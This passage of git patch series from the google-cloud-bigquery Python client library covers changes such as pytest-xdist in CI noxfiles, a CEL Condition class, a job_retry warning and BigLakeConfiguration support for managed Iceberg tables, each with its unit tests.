create_bqstorage_client=True + ) + self.assertFalse(result) + def test__should_use_bqstorage_returns_false_w_warning_if_missing_dependency(self): iterator = self._make_one(first_page_response=None) # not cached From ae632c5a88546d7c60c7780af7baa4f4c5e4e5a4 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 3 Apr 2025 23:20:01 +0200 Subject: [PATCH 084/202] chore(deps): update dependency typing-extensions to v4.13.1 (#2156) Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5fe9005cc..37bcdf687 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -37,6 +37,6 @@ rsa==4.9 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.0; python_version >= '3.10' six==1.17.0 -typing-extensions==4.13.0 +typing-extensions==4.13.1 typing-inspect==0.9.0 urllib3==2.3.0 From 22b80bba9d0bed319fd3102e567906c9b458dd02 Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 10 Apr 2025 10:13:17 -0700 Subject: [PATCH 085/202] feat: add preview support for incremental results (#2145) * feat: add preview support for incremental results Plumbs support to enable incremental results. * fastpath allow * add fastquery test * lint * lint * blacken --- google/cloud/bigquery/_job_helpers.py | 1 + google/cloud/bigquery/job/query.py | 15 +++++++++++++++ tests/unit/job/test_query_config.py | 5 +++++ tests/unit/test__job_helpers.py | 12 ++++++++++++ 4 files changed, 33 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index a8373c356..9193f8184 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -564,6 +564,7 @@ def _supported_by_jobs_query(request_body: Dict[str, Any]) -> bool: "maximumBytesBilled", "requestId", "createSession", + "writeIncrementalResults", } unsupported_keys = request_keys - keys_allowlist diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index a27c10530..f14039bc0 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -674,6 +674,21 @@ def write_disposition(self): def write_disposition(self, value): self._set_sub_prop("writeDisposition", value) + @property + def write_incremental_results(self) -> Optional[bool]: + """This is only supported for a SELECT query using a temporary table. + + If set, the query is allowed to write results incrementally to the temporary result + table. This may incur a performance penalty. This option cannot be used with Legacy SQL. + + This feature is not generally available. + """ + return self._get_sub_prop("writeIncrementalResults") + + @write_incremental_results.setter + def write_incremental_results(self, value): + self._set_sub_prop("writeIncrementalResults", value) + @property def table_definitions(self): """Dict[str, google.cloud.bigquery.external_config.ExternalConfig]: diff --git a/tests/unit/job/test_query_config.py b/tests/unit/job/test_query_config.py index 7818236f4..e0878d067 100644 --- a/tests/unit/job/test_query_config.py +++ b/tests/unit/job/test_query_config.py @@ -167,6 +167,11 @@ def test_connection_properties(self): self.assertEqual(config.connection_properties[1].key, "time_zone") self.assertEqual(config.connection_properties[1].value, "America/Chicago") + def test_incremental_results(self): + config = self._get_target_class()() + config.write_incremental_results = True + self.assertEqual(config.write_incremental_results, True) + def test_create_session(self): config = self._get_target_class()() self.assertIsNone(config.create_session) diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 96914d9f9..4fa093c69 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -194,6 +194,13 @@ def make_query_response( make_query_request({"maximumBytesBilled": "987654"}), id="job_config-with-maximum_bytes_billed", ), + pytest.param( + job_query.QueryJobConfig( + write_incremental_results=True, + ), + make_query_request({"writeIncrementalResults": True}), + id="job_config-with-incremental-results", + ), ), ) def test__to_query_request(job_config, expected): @@ -1141,6 +1148,11 @@ def test_make_job_id_w_job_id_overrides_prefix(): False, id="priority=BATCH", ), + pytest.param( + job_query.QueryJobConfig(write_incremental_results=True), + True, + id="write_incremental_results", + ), ), ) def test_supported_by_jobs_query_from_queryjobconfig( From b162288eb3be5a8bd23b05070eae52fe6c813b1b Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Thu, 10 Apr 2025 10:37:54 -0700 Subject: [PATCH 086/202] chore(python): remove .gitignore from templates (#2160) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(python): remove .gitignore from templates Source-Link: https://github.com/googleapis/synthtool/commit/419d94cdddd0d859ac6743ffebd177693c8a027f Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:a7aef70df5f13313ddc027409fc8f3151422ec2a57ac8730fce8fa75c060d5bb * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * remove replacement in owlbot.py --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou --- .github/.OwlBot.lock.yaml | 4 ++-- owlbot.py | 8 -------- 2 files changed, 2 insertions(+), 10 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 9d743afe8..51b21a62b 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:5581906b957284864632cde4e9c51d1cc66b0094990b27e689132fe5cd036046 -# created: 2025-03-07 + digest: sha256:a7aef70df5f13313ddc027409fc8f3151422ec2a57ac8730fce8fa75c060d5bb +# created: 2025-04-10T17:00:10.042601326Z diff --git a/owlbot.py b/owlbot.py index fceeaa1b6..8cfa2b097 100644 --- a/owlbot.py +++ b/owlbot.py @@ -130,14 +130,6 @@ 'ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"]', ) - -# ---------------------------------------------------------------------------- -# pytype-related changes -# ---------------------------------------------------------------------------- - -# Add .pytype to .gitignore -s.replace(".gitignore", r"\.pytest_cache", "\\g<0>\n.pytype") - s.shell.run(["nox", "-s", "blacken"], hide_output=False) for noxfile in REPO_ROOT.glob("samples/**/noxfile.py"): s.shell.run(["nox", "-s", "blacken"], cwd=noxfile.parent, hide_output=False) From 1cabacbcec17a14d80e62627129cdf26696acabe Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 11 Apr 2025 15:23:01 -0400 Subject: [PATCH 087/202] test: adds pytest-xdist to speed up processing of CI/CD checks (#2153) * experimentation using pytest-xdist * adds pytest-xdist to nox system session for experimentation * adds pytest-xdist install AND -n=auto argument * updates sample noxfiles * updates pytest version in requirements-test.txt files * Update samples/notebooks/requirements-test.txt * Update samples/notebooks/requirements-test.txt --- noxfile.py | 23 ++++++++++++++++++++--- samples/desktopapp/requirements-test.txt | 1 + samples/geography/requirements-test.txt | 1 + samples/magics/requirements-test.txt | 1 + samples/notebooks/requirements-test.txt | 1 + samples/snippets/requirements-test.txt | 1 + 6 files changed, 25 insertions(+), 3 deletions(-) diff --git a/noxfile.py b/noxfile.py index 1b118836b..c2b4bbb50 100644 --- a/noxfile.py +++ b/noxfile.py @@ -98,6 +98,7 @@ def default(session, install_extras=True): "pytest", "google-cloud-testutils", "pytest-cov", + "pytest-xdist", "freezegun", "-c", constraints_path, @@ -129,6 +130,7 @@ def default(session, install_extras=True): # Run py.test against the unit tests. session.run( "py.test", + "-n=auto", "--quiet", "-W default::PendingDeprecationWarning", "--cov=google/cloud/bigquery", @@ -224,7 +226,12 @@ def system(session): # Install all test dependencies, then install local packages in place. session.install( - "pytest", "psutil", "google-cloud-testutils", "-c", constraints_path + "pytest", + "psutil", + "pytest-xdist", + "google-cloud-testutils", + "-c", + constraints_path, ) if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "") == "true": # mTLS test requires pyopenssl and latest google-cloud-storage @@ -257,6 +264,7 @@ def system(session): # Run py.test against the system tests. session.run( "py.test", + "-n=auto", "--quiet", "-W default::PendingDeprecationWarning", os.path.join("tests", "system"), @@ -310,7 +318,9 @@ def snippets(session): ) # Install all test dependencies, then install local packages in place. - session.install("pytest", "google-cloud-testutils", "-c", constraints_path) + session.install( + "pytest", "pytest-xdist", "google-cloud-testutils", "-c", constraints_path + ) session.install("google-cloud-storage", "-c", constraints_path) session.install("grpcio", "-c", constraints_path) @@ -326,9 +336,12 @@ def snippets(session): # Run py.test against the snippets tests. # Skip tests in samples/snippets, as those are run in a different session # using the nox config from that directory. - session.run("py.test", os.path.join("docs", "snippets.py"), *session.posargs) + session.run( + "py.test", "-n=auto", os.path.join("docs", "snippets.py"), *session.posargs + ) session.run( "py.test", + "-n=auto", "samples", "-W default::PendingDeprecationWarning", "--ignore=samples/desktopapp", @@ -393,6 +406,7 @@ def prerelease_deps(session): "google-cloud-testutils", "psutil", "pytest", + "pytest-xdist", "pytest-cov", ) @@ -439,18 +453,21 @@ def prerelease_deps(session): # Run all tests, except a few samples tests which require extra dependencies. session.run( "py.test", + "-n=auto", "tests/unit", "-W default::PendingDeprecationWarning", ) session.run( "py.test", + "-n=auto", "tests/system", "-W default::PendingDeprecationWarning", ) session.run( "py.test", + "-n=auto", "samples/tests", "-W default::PendingDeprecationWarning", ) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index c8290d33f..183230cf4 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,3 +1,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 5d20a4554..7b01ce8ac 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,2 +1,3 @@ pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index c8290d33f..183230cf4 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,3 +1,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index c8290d33f..183230cf4 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,3 +1,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 197b89187..0cf0bb6b4 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -2,3 +2,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 From a69d6b796d2edb6ba453980c9553bc9b206c5a6e Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 16 Apr 2025 05:20:30 -0400 Subject: [PATCH 088/202] feat: adds condition class and assoc. unit tests (#2159) * feat: adds condition class and assoc. unit tests * Updates two test cases for empty string --- google/cloud/bigquery/dataset.py | 93 ++++++++++++++++++- tests/unit/test_dataset.py | 155 +++++++++++++++++++++++++++++++ 2 files changed, 246 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index 15a11fb40..cc14598fe 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -19,6 +19,7 @@ import copy import typing +from typing import Optional, List, Dict, Any, Union import google.cloud._helpers # type: ignore @@ -29,8 +30,6 @@ from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration from google.cloud.bigquery import external_config -from typing import Optional, List, Dict, Any, Union - def _get_table_reference(self, table_id: str) -> TableReference: """Constructs a TableReference. @@ -1074,3 +1073,93 @@ def reference(self): model = _get_model_reference routine = _get_routine_reference + + +class Condition(object): + """Represents a textual expression in the Common Expression Language (CEL) syntax. + + Typically used for filtering or policy rules, such as in IAM Conditions + or BigQuery row/column access policies. + + See: + https://cloud.google.com/iam/docs/reference/rest/Shared.Types/Expr + https://github.com/google/cel-spec + + Args: + expression (str): + The condition expression string using CEL syntax. This is required. + Example: ``resource.type == "compute.googleapis.com/Instance"`` + title (Optional[str]): + An optional title for the condition, providing a short summary. + Example: ``"Request is for a GCE instance"`` + description (Optional[str]): + An optional description of the condition, providing a detailed explanation. + Example: ``"This condition checks whether the resource is a GCE instance."`` + """ + + def __init__( + self, + expression: str, + title: Optional[str] = None, + description: Optional[str] = None, + ): + self._properties: Dict[str, Any] = {} + # Use setters to initialize properties, which also handle validation + self.expression = expression + self.title = title + self.description = description + + @property + def title(self) -> Optional[str]: + """Optional[str]: The title for the condition.""" + return self._properties.get("title") + + @title.setter + def title(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("Pass a string for title, or None") + self._properties["title"] = value + + @property + def description(self) -> Optional[str]: + """Optional[str]: The description for the condition.""" + return self._properties.get("description") + + @description.setter + def description(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("Pass a string for description, or None") + self._properties["description"] = value + + @property + def expression(self) -> str: + """str: The expression string for the condition.""" + + # Cast assumes expression is always set due to __init__ validation + return typing.cast(str, self._properties.get("expression")) + + @expression.setter + def expression(self, value: str): + if not isinstance(value, str): + raise ValueError("Pass a non-empty string for expression") + if not value: + raise ValueError("expression cannot be an empty string") + self._properties["expression"] = value + + def to_api_repr(self) -> Dict[str, Any]: + """Construct the API resource representation of this Condition.""" + return self._properties + + @classmethod + def from_api_repr(cls, resource: Dict[str, Any]) -> "Condition": + """Factory: construct a Condition instance given its API representation.""" + + # Ensure required fields are present in the resource if necessary + if "expression" not in resource: + raise ValueError("API representation missing required 'expression' field.") + + return cls( + expression=resource["expression"], + title=resource.get("title"), + description=resource.get("description"), + ) diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 8ab8dffec..036e22458 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -19,6 +19,7 @@ import pytest from google.cloud.bigquery.dataset import ( AccessEntry, + Condition, Dataset, DatasetReference, Table, @@ -1228,3 +1229,157 @@ def test_table(self): self.assertEqual(table.table_id, "table_id") self.assertEqual(table.dataset_id, dataset_id) self.assertEqual(table.project, project) + + +class TestCondition: + EXPRESSION = 'resource.name.startsWith("projects/my-project/instances/")' + TITLE = "Instance Access" + DESCRIPTION = "Access to instances in my-project" + + @pytest.fixture + def condition_instance(self): + """Provides a Condition instance for tests.""" + return Condition( + expression=self.EXPRESSION, + title=self.TITLE, + description=self.DESCRIPTION, + ) + + @pytest.fixture + def condition_api_repr(self): + """Provides the API representation for the test Condition.""" + return { + "expression": self.EXPRESSION, + "title": self.TITLE, + "description": self.DESCRIPTION, + } + + # --- Basic Functionality Tests --- + + def test_constructor_and_getters_full(self, condition_instance): + """Test initialization with all arguments and subsequent attribute access.""" + assert condition_instance.expression == self.EXPRESSION + assert condition_instance.title == self.TITLE + assert condition_instance.description == self.DESCRIPTION + + def test_constructor_and_getters_minimal(self): + """Test initialization with only the required expression.""" + condition = Condition(expression=self.EXPRESSION) + assert condition.expression == self.EXPRESSION + assert condition.title is None + assert condition.description is None + + def test_setters(self, condition_instance): + """Test setting attributes after initialization.""" + new_title = "New Title" + new_desc = "New Description" + new_expr = "request.time < timestamp('2024-01-01T00:00:00Z')" + + condition_instance.title = new_title + assert condition_instance.title == new_title + + condition_instance.description = new_desc + assert condition_instance.description == new_desc + + condition_instance.expression = new_expr + assert condition_instance.expression == new_expr + + # Test setting title and description to empty strings + condition_instance.title = "" + assert condition_instance.title == "" + + condition_instance.description = "" + assert condition_instance.description == "" + + # Test setting optional fields back to None + condition_instance.title = None + assert condition_instance.title is None + condition_instance.description = None + assert condition_instance.description is None + + # --- API Representation Tests --- + + def test_to_api_repr_full(self, condition_instance, condition_api_repr): + """Test converting a fully populated Condition to API representation.""" + api_repr = condition_instance.to_api_repr() + assert api_repr == condition_api_repr + + def test_to_api_repr_minimal(self): + """Test converting a minimally populated Condition to API representation.""" + condition = Condition(expression=self.EXPRESSION) + expected_api_repr = { + "expression": self.EXPRESSION, + "title": None, + "description": None, + } + api_repr = condition.to_api_repr() + assert api_repr == expected_api_repr + + def test_from_api_repr_full(self, condition_api_repr): + """Test creating a Condition from a full API representation.""" + condition = Condition.from_api_repr(condition_api_repr) + assert condition.expression == self.EXPRESSION + assert condition.title == self.TITLE + assert condition.description == self.DESCRIPTION + + def test_from_api_repr_minimal(self): + """Test creating a Condition from a minimal API representation.""" + minimal_repr = {"expression": self.EXPRESSION} + condition = Condition.from_api_repr(minimal_repr) + assert condition.expression == self.EXPRESSION + assert condition.title is None + assert condition.description is None + + def test_from_api_repr_with_extra_fields(self): + """Test creating a Condition from an API repr with unexpected fields.""" + api_repr = { + "expression": self.EXPRESSION, + "title": self.TITLE, + "unexpected_field": "some_value", + } + condition = Condition.from_api_repr(api_repr) + assert condition.expression == self.EXPRESSION + assert condition.title == self.TITLE + assert condition.description is None + # Check that the extra field didn't get added to internal properties + assert "unexpected_field" not in condition._properties + + # # --- Validation Tests --- + + @pytest.mark.parametrize( + "kwargs, error_msg", + [ + ({"expression": None}, "Pass a non-empty string for expression"), # type: ignore + ({"expression": ""}, "expression cannot be an empty string"), + ({"expression": 123}, "Pass a non-empty string for expression"), # type: ignore + ({"expression": EXPRESSION, "title": 123}, "Pass a string for title, or None"), # type: ignore + ({"expression": EXPRESSION, "description": False}, "Pass a string for description, or None"), # type: ignore + ], + ) + def test_validation_init(self, kwargs, error_msg): + """Test validation during __init__.""" + with pytest.raises(ValueError, match=error_msg): + Condition(**kwargs) + + @pytest.mark.parametrize( + "attribute, value, error_msg", + [ + ("expression", None, "Pass a non-empty string for expression"), # type: ignore + ("expression", "", "expression cannot be an empty string"), + ("expression", 123, "Pass a non-empty string for expression"), # type: ignore + ("title", 123, "Pass a string for title, or None"), # type: ignore + ("description", [], "Pass a string for description, or None"), # type: ignore + ], + ) + def test_validation_setters(self, condition_instance, attribute, value, error_msg): + """Test validation via setters.""" + with pytest.raises(ValueError, match=error_msg): + setattr(condition_instance, attribute, value) + + def test_validation_expression_required_from_api(self): + """Test ValueError is raised if expression is missing in from_api_repr.""" + api_repr = {"title": self.TITLE} + with pytest.raises( + ValueError, match="API representation missing required 'expression' field." + ): + Condition.from_api_repr(api_repr) From ca1798aaee2d5905fe688d3097f8ee5c989da333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Thu, 24 Apr 2025 15:46:59 -0500 Subject: [PATCH 089/202] fix: `query()` now warns when `job_id` is set and the default `job_retry` is ignored (#2167) * fix: `query()` now warns when `job_id` is set and the default `job_retry` is ignored * Update google/cloud/bigquery/client.py * allow None for job_retry in code path that calls jobs.query from client.query * allow None for job_retry in code path that calls jobs.query from client.query * Update tests/unit/test_job_retry.py --- google/cloud/bigquery/_job_helpers.py | 42 ++++++++++++++++++++++++++- google/cloud/bigquery/client.py | 15 ++-------- tests/unit/test_job_retry.py | 18 ++++++++---- 3 files changed, 57 insertions(+), 18 deletions(-) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 9193f8184..4a884ada5 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -39,7 +39,9 @@ import functools import os import uuid +import textwrap from typing import Any, Dict, Optional, TYPE_CHECKING, Union +import warnings import google.api_core.exceptions as core_exceptions from google.api_core import retry as retries @@ -198,6 +200,44 @@ def _validate_job_config(request_body: Dict[str, Any], invalid_key: str): raise ValueError(f"got unexpected key {repr(invalid_key)} in job_config") +def validate_job_retry(job_id: Optional[str], job_retry: Optional[retries.Retry]): + """Catch common mistakes, such as setting a job_id and job_retry at the same + time. + """ + if job_id is not None and job_retry is not None: + # TODO(tswast): To avoid breaking changes but still allow a default + # query job retry, we currently only raise if they explicitly set a + # job_retry other than the default. In a future version, we may want to + # avoid this check for DEFAULT_JOB_RETRY and always raise. + if job_retry is not google.cloud.bigquery.retry.DEFAULT_JOB_RETRY: + raise TypeError( + textwrap.dedent( + """ + `job_retry` was provided, but the returned job is + not retryable, because a custom `job_id` was + provided. To customize the job ID and allow for job + retries, set job_id_prefix, instead. + """ + ).strip() + ) + else: + warnings.warn( + textwrap.dedent( + """ + job_retry must be explicitly set to None if job_id is set. + BigQuery cannot retry a failed job by using the exact + same ID. Setting job_id without explicitly disabling + job_retry will raise an error in the future. To avoid this + warning, either use job_id_prefix instead (preferred) or + set job_retry=None. + """ + ).strip(), + category=FutureWarning, + # user code -> client.query / client.query_and_wait -> validate_job_retry + stacklevel=3, + ) + + def _to_query_request( job_config: Optional[job.QueryJobConfig] = None, *, @@ -308,7 +348,7 @@ def query_jobs_query( project: str, retry: retries.Retry, timeout: Optional[float], - job_retry: retries.Retry, + job_retry: Optional[retries.Retry], ) -> job.QueryJob: """Initiate a query using jobs.query with jobCreationMode=JOB_CREATION_REQUIRED. diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 8bbdd6c32..e7cafc47e 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3388,7 +3388,7 @@ def query( project: Optional[str] = None, retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, - job_retry: retries.Retry = DEFAULT_JOB_RETRY, + job_retry: Optional[retries.Retry] = DEFAULT_JOB_RETRY, api_method: Union[str, enums.QueryApiMethod] = enums.QueryApiMethod.INSERT, ) -> job.QueryJob: """Run a SQL query. @@ -3455,18 +3455,9 @@ def query( class, or if both ``job_id`` and non-``None`` non-default ``job_retry`` are provided. """ - job_id_given = job_id is not None - if ( - job_id_given - and job_retry is not None - and job_retry is not DEFAULT_JOB_RETRY - ): - raise TypeError( - "`job_retry` was provided, but the returned job is" - " not retryable, because a custom `job_id` was" - " provided." - ) + _job_helpers.validate_job_retry(job_id, job_retry) + job_id_given = job_id is not None if job_id_given and api_method == enums.QueryApiMethod.QUERY: raise TypeError( "`job_id` was provided, but the 'QUERY' `api_method` was requested." diff --git a/tests/unit/test_job_retry.py b/tests/unit/test_job_retry.py index 958986052..7144c640b 100644 --- a/tests/unit/test_job_retry.py +++ b/tests/unit/test_job_retry.py @@ -511,26 +511,34 @@ def api_request(method, path, query_params=None, data=None, **kw): def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client): with pytest.raises( TypeError, - match=re.escape( + match=( "`job_retry` was provided, but the returned job is" " not retryable, because a custom `job_id` was" " provided." - ), + ).replace(" ", r"\s"), ): client.query("select 42", job_id=42, job_retry=google.api_core.retry.Retry()) def test_raises_on_job_retry_on_result_with_non_retryable_jobs(client): client._connection = make_connection({}) - job = client.query("select 42", job_id=42) + + with pytest.warns( + FutureWarning, + match=re.escape("job_retry must be explicitly set to None if job_id is set."), + ): + # Implicitly providing a job_retry is a warning and will be an error in the future. + job = client.query("select 42", job_id=42) + with pytest.raises( TypeError, - match=re.escape( + match=( "`job_retry` was provided, but this job is" " not retryable, because a custom `job_id` was" " provided to the query that created this job." - ), + ).replace(" ", r"\s"), ): + # Explicitly providing a job_retry is an error. job.result(job_retry=google.api_core.retry.Retry()) From a1c8e9aaf60986924868d54a0ab0334e77002a39 Mon Sep 17 00:00:00 2001 From: shollyman Date: Fri, 25 Apr 2025 10:29:54 -0700 Subject: [PATCH 090/202] feat: support BigLakeConfiguration (managed Iceberg tables) (#2162) * feat: support BigLakeConfiguration (managed Iceberg tables) This PR adds the BigLakeConfiguration class to tables, and the necessary property mappings from Table. It also adds some utility enums (BigLakeFileFormat, BigLakeTableFormat) to more easily communicate available values for configuraiton. --- google/cloud/bigquery/enums.py | 16 ++++ google/cloud/bigquery/table.py | 150 +++++++++++++++++++++++++++++++ tests/unit/test_table.py | 160 +++++++++++++++++++++++++++++++++ 3 files changed, 326 insertions(+) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 5519bc989..b32fc8200 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -387,3 +387,19 @@ def _generate_next_value_(name, start, count, last_values): ROUNDING_MODE_UNSPECIFIED = enum.auto() ROUND_HALF_AWAY_FROM_ZERO = enum.auto() ROUND_HALF_EVEN = enum.auto() + + +class BigLakeFileFormat(object): + FILE_FORMAT_UNSPECIFIED = "FILE_FORMAT_UNSPECIFIED" + """The default unspecified value.""" + + PARQUET = "PARQUET" + """Apache Parquet format.""" + + +class BigLakeTableFormat(object): + TABLE_FORMAT_UNSPECIFIED = "TABLE_FORMAT_UNSPECIFIED" + """The default unspecified value.""" + + ICEBERG = "ICEBERG" + """Apache Iceberg format.""" diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 8a3b6151a..503ca4e71 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -380,6 +380,7 @@ class Table(_TableBase): _PROPERTY_TO_API_FIELD: Dict[str, Any] = { **_TableBase._PROPERTY_TO_API_FIELD, + "biglake_configuration": "biglakeConfiguration", "clustering_fields": "clustering", "created": "creationTime", "description": "description", @@ -431,6 +432,29 @@ def __init__(self, table_ref, schema=None) -> None: reference = property(_reference_getter) + @property + def biglake_configuration(self): + """google.cloud.bigquery.table.BigLakeConfiguration: Configuration + for managed tables for Apache Iceberg. + + See https://cloud.google.com/bigquery/docs/iceberg-tables for more information. + """ + prop = self._properties.get( + self._PROPERTY_TO_API_FIELD["biglake_configuration"] + ) + if prop is not None: + prop = BigLakeConfiguration.from_api_repr(prop) + return prop + + @biglake_configuration.setter + def biglake_configuration(self, value): + api_repr = value + if value is not None: + api_repr = value.to_api_repr() + self._properties[ + self._PROPERTY_TO_API_FIELD["biglake_configuration"] + ] = api_repr + @property def require_partition_filter(self): """bool: If set to true, queries over the partitioned table require a @@ -3501,6 +3525,132 @@ def to_api_repr(self) -> Dict[str, Any]: return resource +class BigLakeConfiguration(object): + """Configuration for managed tables for Apache Iceberg, formerly + known as BigLake. + + Args: + connection_id (Optional[str]): + The connection specifying the credentials to be used to read and write to external + storage, such as Cloud Storage. The connection_id can have the form + ``{project}.{location}.{connection_id}`` or + ``projects/{project}/locations/{location}/connections/{connection_id}``. + storage_uri (Optional[str]): + The fully qualified location prefix of the external folder where table data is + stored. The '*' wildcard character is not allowed. The URI should be in the + format ``gs://bucket/path_to_table/``. + file_format (Optional[str]): + The file format the table data is stored in. See BigLakeFileFormat for available + values. + table_format (Optional[str]): + The table format the metadata only snapshots are stored in. See BigLakeTableFormat + for available values. + _properties (Optional[dict]): + Private. Used to construct object from API resource. + """ + + def __init__( + self, + connection_id: Optional[str] = None, + storage_uri: Optional[str] = None, + file_format: Optional[str] = None, + table_format: Optional[str] = None, + _properties: Optional[dict] = None, + ) -> None: + if _properties is None: + _properties = {} + self._properties = _properties + if connection_id is not None: + self.connection_id = connection_id + if storage_uri is not None: + self.storage_uri = storage_uri + if file_format is not None: + self.file_format = file_format + if table_format is not None: + self.table_format = table_format + + @property + def connection_id(self) -> Optional[str]: + """str: The connection specifying the credentials to be used to read and write to external + storage, such as Cloud Storage.""" + return self._properties.get("connectionId") + + @connection_id.setter + def connection_id(self, value: Optional[str]): + self._properties["connectionId"] = value + + @property + def storage_uri(self) -> Optional[str]: + """str: The fully qualified location prefix of the external folder where table data is + stored.""" + return self._properties.get("storageUri") + + @storage_uri.setter + def storage_uri(self, value: Optional[str]): + self._properties["storageUri"] = value + + @property + def file_format(self) -> Optional[str]: + """str: The file format the table data is stored in. See BigLakeFileFormat for available + values.""" + return self._properties.get("fileFormat") + + @file_format.setter + def file_format(self, value: Optional[str]): + self._properties["fileFormat"] = value + + @property + def table_format(self) -> Optional[str]: + """str: The table format the metadata only snapshots are stored in. See BigLakeTableFormat + for available values.""" + return self._properties.get("tableFormat") + + @table_format.setter + def table_format(self, value: Optional[str]): + self._properties["tableFormat"] = value + + def _key(self): + return tuple(sorted(self._properties.items())) + + def __eq__(self, other): + if not isinstance(other, BigLakeConfiguration): + return NotImplemented + return self._key() == other._key() + + def __ne__(self, other): + return not self == other + + def __hash__(self): + return hash(self._key()) + + def __repr__(self): + key_vals = ["{}={}".format(key, val) for key, val in self._key()] + return "BigLakeConfiguration({})".format(",".join(key_vals)) + + @classmethod + def from_api_repr(cls, resource: Dict[str, Any]) -> "BigLakeConfiguration": + """Factory: construct a BigLakeConfiguration given its API representation. + + Args: + resource: + BigLakeConfiguration representation returned from the API + + Returns: + BigLakeConfiguration parsed from ``resource``. + """ + ref = cls() + ref._properties = resource + return ref + + def to_api_repr(self) -> Dict[str, Any]: + """Construct the API resource representation of this BigLakeConfiguration. + + Returns: + BigLakeConfiguration represented as an API resource. + """ + return copy.deepcopy(self._properties) + + def _item_to_row(iterator, resource): """Convert a JSON row to the native object. diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index a9966f1ce..253006547 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -435,6 +435,12 @@ def _make_resource(self): "sourceFormat": "CSV", "csvOptions": {"allowJaggedRows": True, "encoding": "encoding"}, }, + "biglakeConfiguration": { + "connectionId": "connection", + "storageUri": "uri", + "fileFormat": "PARQUET", + "tableFormat": "ICEBERG", + }, "labels": {"x": "y"}, } @@ -521,6 +527,15 @@ def _verifyResourceProperties(self, table, resource): else: self.assertIsNone(table.encryption_configuration) + if "biglakeConfiguration" in resource: + self.assertIsNotNone(table.biglake_configuration) + self.assertEqual(table.biglake_configuration.connection_id, "connection") + self.assertEqual(table.biglake_configuration.storage_uri, "uri") + 